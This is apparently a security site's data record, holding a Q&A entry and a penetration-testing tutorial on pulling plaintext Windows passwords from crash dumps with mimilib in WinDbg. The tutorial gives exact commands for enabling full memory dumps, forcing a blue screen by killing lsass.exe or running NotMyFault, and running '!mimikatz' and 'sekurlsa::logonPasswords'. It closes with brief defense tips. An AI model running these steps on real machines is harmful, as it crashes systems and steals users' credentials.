[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdVDY3_Aq5A0wQjVz8G5NA1uHV67OQqq575QXsyVyExA":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},616,"What registry setting is needed to enable complete memory dumps, and how can a blue screen be triggered?","To enable complete memory dumps, set `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled` to 1 (REG_DWORD). This can be done with the command `reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff`. A BSOD can be forced by terminating a critical process like `lsass.exe` or by using Sysinternals' NotMyFault with the `\u002Fcrash` switch. After the crash, the dump file is created at `c:\\windows\\MEMORY.DMP`. For more on credential extraction from remote sessions, see [Penetration Technique - Extracting User Plaintext Passwords via CredSSP](\u002Fnews\u002Fpenetration-technique-extracting-user-plaintext-passwords-via-credssp).","\u003Cp>To enable complete memory dumps, set `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled` to 1 (REG_DWORD). This can be done with the command `reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff`. A BSOD can be forced by terminating a critical process like `lsass.exe` or by using Sysinternals&#39; NotMyFault with the `\u002Fcrash` switch. After the crash, the dump file is created at `c:\\windows\\MEMORY.DMP`. For more on credential extraction from remote sessions, see [Penetration Technique - Extracting User Plaintext Passwords via CredSSP](\u002Fnews\u002Fpenetration-technique-extracting-user-plaintext-passwords-via-credssp).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-extracting-passwords-from-dump-files-using-mimilib\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-registry-setting-is-needed-to-enable-complete-memory-dumps-and-how-can-a-bl-1777482486080","CrashDumpEnabled, registry, complete memory dump, BSOD, NotMyFault, critical process",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},152,"Penetration Techniques - Extracting Passwords from Dump Files Using Mimilib","penetration-techniques-extracting-passwords-from-dump-files-using-mimilib","Learn to extract passwords from kernel-mode dump files using Mimilib as a WinDbg plugin, including setup, exploitation, and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'Analysis of Mimilib Exploitation' mentioned that mimilib can be used as a WinDbg plugin. This article will detail the usage of this plugin to extract passwords from kernel-mode dump files, and provide defense recommendations based on exploitation approaches.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Classification of dump files\u003C\u002Fli>\u003Cli>Two methods for extracting dump files\u003C\u002Fli>\u003Cli>WinDbg environment configuration\u003C\u002Fli>\u003Cli>Exploitation approaches\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Classification of dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Dump files are divided into the following two categories:\u003C\u002Fp>\u003Ch3>1.User-Mode Dump File\u003C\u002Fh3>\u003Cp>User-mode dump files, which are divided into the following two types:\u003C\u002Fp>\u003Cul>\u003Cli>Full User-Mode Dumps\u003C\u002Fli>\u003Cli>Minidumps\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: Usually targets a single process\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fuser-mode-dump-files\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Can be created using Procdump\u003C\u002Fp>\u003Cp>Method for extracting passwords from user-mode dump files:\u003C\u002Fp>\u003Cp>Refer to the previous article 'Penetration Basics - Extracting Credentials from the lsass.exe Process'\u003C\u002Fp>\u003Ch3>2.Kernel-Mode Dump Files\u003C\u002Fh3>\u003Cp>Kernel-mode dump files, which are divided into the following five types:\u003C\u002Fp>\u003Cul>\u003Cli>Complete Memory Dump\u003C\u002Fli>\u003Cli>Kernel Memory Dump\u003C\u002Fli>\u003Cli>Small Memory Dump\u003C\u002Fli>\u003Cli>Automatic Memory Dump\u003C\u002Fli>\u003Cli>Active Memory Dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: includes information of all processes\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Enable the dump file creation feature, which will automatically create when the system crashes (BSOD)\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fkernel-mode-dump-files\u003C\u002Fp>\u003Ch2>0x03 Method for extracting passwords from kernel-mode dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Process is as follows:\u003C\u002Fp>\u003Cp>1. Enable the dump file feature\u003C\u002Fp>\u003Cp>2. Force a system blue screen (BSOD), the system will automatically create a kernel-mode dump file\u003C\u002Fp>\u003Cp>3. Use WinDbg to load the dump file, call mimilib to extract plaintext passwords\u003C\u002Fp>\u003Cp>Specific issues to note:\u003C\u002Fp>\u003Ch3>1. Enable dump file functionality\u003C\u002Fh3>\u003Cp>Corresponding registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl, registry entry CrashDumpEnabled, type REG_DWORD\u003C\u002Fp>\u003Cp>The functions corresponding to the values are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>0 indicates not enabled\u003C\u002Fli>\u003Cli>1 indicates complete memory dump\u003C\u002Fli>\u003Cli>2 indicates kernel memory dump\u003C\u002Fli>\u003Cli>3 indicates automatic memory dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command to view this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Here, the key value needs to be set to 1 to enable the complete memory dump functionality; otherwise, when using WinDbg to access the memory of the lsass.exe process, it will prompt an invalid page directory, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017288059_0_d6869dfee9.jpeg\">\u003C\u002Fp>\u003Cp>The cmd command to modify this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Force a system blue screen (BSOD)\u003C\u002Fh3>\u003Ch4>(1) Cause BSOD by terminating a process with the critical process attribute\u003C\u002Fh4>\u003Cp>The system processes that are critical by default are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>csrss.exe\u003C\u002Fli>\u003Cli>lsass.exe\u003C\u002Fli>\u003Cli>services.exe\u003C\u002Fli>\u003Cli>smss.exe\u003C\u002Fli>\u003Cli>svchost.exe\u003C\u002Fli>\u003Cli>wininit.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can also set a specified process as a critical process first; terminating this process will also cause a BSOD.\u003C\u002Fp>\u003Cp>For specific details, refer to the previous article 'Analysis of Exploitation Causing BSOD by Terminating Processes'.\u003C\u002Fp>\u003Ch4>(2) Using NotMyFault\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fdownloads\u002Fnotmyfault\u003C\u002Fp>\u003Cp>The command to trigger a blue screen (BSOD) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fcrash\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>NotMyFault also supports suspending the current system with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fhang\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, the system will automatically reboot after a Blue Screen of Death (BSOD) and generate the file c:\\windows\\MEMORY.DMP\u003C\u002Fp>\u003Ch3>3. Use WinDbg to load MEMORY.DMP\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>WinDbg can be automatically installed after installing the SDK\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fdebugger-download-tools\u003C\u002Fp>\u003Cp>Using WinDbg, select Open Crash Dump and choose MEMORY.DMP\u003C\u002Fp>\u003Cp>The command to obtain detailed dump file information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!analyze -v\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Error prompt: Kernel symbols are WRONG. Please fix symbols to do analysis.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017318291_1_52c3dbadaa.jpeg\">\u003C\u002Fp>\u003Cp>Here, the symbol files need to be fixed. You can choose from the following three solutions:\u003C\u002Fp>\u003Ch3>(1) using the _NT_SYMBOL_PATH environment variable.\u003C\u002Fh3>\u003Cp>Add environment variable:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>set _NT_SYMBOL_PATH=srv*c:\\mysymbol*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) using the -y \u003Csymbol_path> argument when starting the debugger.\u003C\u002Fsymbol_path>\u003C\u002Fh3>\u003Cp>Launch WinDbg with specified parameters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>windbg.exe -y SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(3) using .sympath and .sympath+\u003C\u002Fh3>\u003Cp>Add Symbol File Path\u003C\u002Fp>\u003Cp>WinDbg command line operation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can also be done via the interface\u003C\u002Fp>\u003Cp>File-&gt;Symbol File Path ...\u003C\u002Fp>\u003Cp>Enter SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003Cp>After setup, required symbol files will automatically download from the Microsoft public symbol server\u003C\u002Fp>\u003Cp>Reload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017362654_2_3101ff7258.jpeg\">\u003C\u002Fp>\u003Cp>If this part still fails, try using a VPN to connect to the internet\u003C\u002Fp>\u003Cp>If the test environment cannot connect to the internet, symbol files can be downloaded by obtaining manifest files via SymChk\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fusing-a-manifest-file-with-symchk\u003C\u002Fp>\u003Cp>Execute on computer A (without internet connection):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fom c:\\Manifest\\man.txt \u002Fid c:\\test\\MEMORY.DMP\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the file c:\\Manifest\\man.txt, copy it to computer B (with internet connection), and execute the following command on computer B:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SymChk \u002Fim c:\\test\\man.txt \u002Fs srv*c:\\mysymbolNew*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A new folder c:\\mysymbolNew will be generated. Copy it to computer A, start WinDbg on computer A, and specify the new symbol file location as c:\\mysymbolNew with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.symfix c:\\mysymbolNew\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.Reload\u003Cbr>!process 0 0 lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Loaded normally, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017391534_3_aaf1f568cc.jpeg\">\u003C\u002Fp>\u003Ch3>4. Load mimilib plugin\u003C\u002Fh3>\u003Cp>Refer to the previous article 'Mimilib Utilization Analysis'\u003C\u002Fp>\u003Ch3>(1) Method 1\u003C\u002Fh3>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The saved path in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) Method 2\u003C\u002Fh3>\u003Cp>Directly load the absolute path of mimilib, example as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load c:\\test\\mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In summary, the complete command to set up the configuration environment and export passwords is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003Cbr>.reload\u003Cbr>!process 0 0 lsass.exe\u003Cbr>.process 890f4530\u003Cbr>.load c:\\test\\mimilib\u003Cbr>.reload\u003Cbr>!mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete process is shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017417953_4_294dd38340.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017462794_5_b1efcc088e.jpeg\">\u003C\u002Fp>\u003Cp>To save the output results to a file, you can use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.logopen c:\\test\\log.txt\u003Cbr>!mimikatz\u003Cbr>.logclose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Obtain a dump file of the lsass.exe process via the API MiniDumpWriteDump()\u003C\u002Fp>\u003Cp>Use mimikatz to extract passwords from the dump file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe log \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords full\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable the dump file functionality\u003C\u002Fp>\u003Cp>Force a system Blue Screen of Death (BSOD)\u003C\u002Fp>\u003Cp>Load the dump file using WinDbg and invoke mimilib to export plaintext passwords\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Extracting passwords from user-mode dump files\u003C\u002Fh3>\u003Cp>Intercept the behavior of the API MiniDumpWriteDump(); some security products already support this feature\u003C\u002Fp>\u003Ch3>2. Extracting passwords from kernel-mode dump files\u003C\u002Fh3>\u003Cp>Enable dump encryption\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-server\u002Fvirtualization\u002Fhyper-v\u002Fmanage\u002Fabout-dump-encryption\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If an attacker gains administrator privileges on the system, they can disable dump encryption\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduced methods for extracting passwords from user-mode dump files and kernel-mode dump files, and provided defense recommendations based on exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The previous article 'Analysis of Mimilib Exploitation' mentioned that mimilib can be used as a WinDbg plugin. This article will detail the usage of this plugin to extract passwords from kernel-mode dump files, and provide defense recommendations based on exploitation approaches.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Classification of dump files\u003C\u002Fli>\u003Cli>Two methods for extracting dump files\u003C\u002Fli>\u003Cli>WinDbg environment configuration\u003C\u002Fli>\u003Cli>Exploitation approaches\u003C\u002Fli>\u003Cli>Defense recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Classification of dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Dump files are divided into the following two categories:\u003C\u002Fp>\u003Ch3>1.User-Mode Dump File\u003C\u002Fh3>\u003Cp>User-mode dump files, which are divided into the following two types:\u003C\u002Fp>\u003Cul>\u003Cli>Full User-Mode Dumps\u003C\u002Fli>\u003Cli>Minidumps\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: Usually targets a single process\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fuser-mode-dump-files\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Can be created using Procdump\u003C\u002Fp>\u003Cp>Method for extracting passwords from user-mode dump files:\u003C\u002Fp>\u003Cp>Refer to the previous article 'Penetration Basics - Extracting Credentials from the lsass.exe Process'\u003C\u002Fp>\u003Ch3>2.Kernel-Mode Dump Files\u003C\u002Fh3>\u003Cp>Kernel-mode dump files, which are divided into the following five types:\u003C\u002Fp>\u003Cul>\u003Cli>Complete Memory Dump\u003C\u002Fli>\u003Cli>Kernel Memory Dump\u003C\u002Fli>\u003Cli>Small Memory Dump\u003C\u002Fli>\u003Cli>Automatic Memory Dump\u003C\u002Fli>\u003Cli>Active Memory Dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Simple understanding: includes information of all processes\u003C\u002Fp>\u003Cp>Creation method:\u003C\u002Fp>\u003Cp>Enable the dump file creation feature, which will automatically create when the system crashes (BSOD)\u003C\u002Fp>\u003Cp>Additional references:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fkernel-mode-dump-files\u003C\u002Fp>\u003Ch2>0x03 Method for extracting passwords from kernel-mode dump files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Process is as follows:\u003C\u002Fp>\u003Cp>1. Enable the dump file feature\u003C\u002Fp>\u003Cp>2. Force a system blue screen (BSOD), the system will automatically create a kernel-mode dump file\u003C\u002Fp>\u003Cp>3. Use WinDbg to load the dump file, call mimilib to extract plaintext passwords\u003C\u002Fp>\u003Cp>Specific issues to note:\u003C\u002Fp>\u003Ch3>1. Enable dump file functionality\u003C\u002Fh3>\u003Cp>Corresponding registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CrashControl, registry entry CrashDumpEnabled, type REG_DWORD\u003C\u002Fp>\u003Cp>The functions corresponding to the values are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>0 indicates not enabled\u003C\u002Fli>\u003Cli>1 indicates complete memory dump\u003C\u002Fli>\u003Cli>2 indicates kernel memory dump\u003C\u002Fli>\u003Cli>3 indicates automatic memory dump\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The cmd command to view this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Here, the key value needs to be set to 1 to enable the complete memory dump functionality; otherwise, when using WinDbg to access the memory of the lsass.exe process, it will prompt an invalid page directory, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017288059_0_d6869dfee9-1.jpeg\">\u003C\u002Fp>\u003Cp>The cmd command to modify this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SYSTEM\\CurrentControlSet\\Control\\CrashControl \u002Fv CrashDumpEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Force a system blue screen (BSOD)\u003C\u002Fh3>\u003Ch4>(1) Cause BSOD by terminating a process with the critical process attribute\u003C\u002Fh4>\u003Cp>The system processes that are critical by default are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>csrss.exe\u003C\u002Fli>\u003Cli>lsass.exe\u003C\u002Fli>\u003Cli>services.exe\u003C\u002Fli>\u003Cli>smss.exe\u003C\u002Fli>\u003Cli>svchost.exe\u003C\u002Fli>\u003Cli>wininit.exe\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can also set a specified process as a critical process first; terminating this process will also cause a BSOD.\u003C\u002Fp>\u003Cp>For specific details, refer to the previous article 'Analysis of Exploitation Causing BSOD by Terminating Processes'.\u003C\u002Fp>\u003Ch4>(2) Using NotMyFault\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fdownloads\u002Fnotmyfault\u003C\u002Fp>\u003Cp>The command to trigger a blue screen (BSOD) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fcrash\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>NotMyFault also supports suspending the current system with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>notmyfault.exe -accepteula \u002Fhang\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, the system will automatically reboot after a Blue Screen of Death (BSOD) and generate the file c:\\windows\\MEMORY.DMP\u003C\u002Fp>\u003Ch3>3. Use WinDbg to load MEMORY.DMP\u003C\u002Fh3>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>WinDbg can be automatically installed after installing the SDK\u003C\u002Fp>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows-hardware\u002Fdrivers\u002Fdebugger\u002Fdebugger-download-tools\u003C\u002Fp>\u003Cp>Using WinDbg, select Open Crash Dump and choose MEMORY.DMP\u003C\u002Fp>\u003Cp>The command to obtain detailed dump file information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!analyze -v\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Error prompt: Kernel symbols are WRONG. Please fix symbols to do analysis.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017318291_1_52c3dbadaa-1.jpeg\">\u003C\u002Fp>\u003Cp>Here, the symbol files need to be fixed. You can choose from the following three solutions:\u003C\u002Fp>\u003Ch3>(1) using the _NT_SYMBOL_PATH environment variable.\u003C\u002Fh3>\u003Cp>Add environment variable:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>set _NT_SYMBOL_PATH=srv*c:\\mysymbol*https:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) using the -y \u003Csymbol_path> argument when starting the debugger.\u003C\u002Fsymbol_path>\u003C\u002Fh3>\u003Cp>Launch WinDbg with specified parameters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>windbg.exe -y SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(3) using .sympath and .sympath+\u003C\u002Fh3>\u003Cp>Add Symbol File Path\u003C\u002Fp>\u003Cp>WinDbg command line operation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.sympath SRV*c:\\mysymbol*http:\u002F\u002Fmsdl.microsoft.com\u002Fdownload\u002Fsymbols\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Can also be done via the 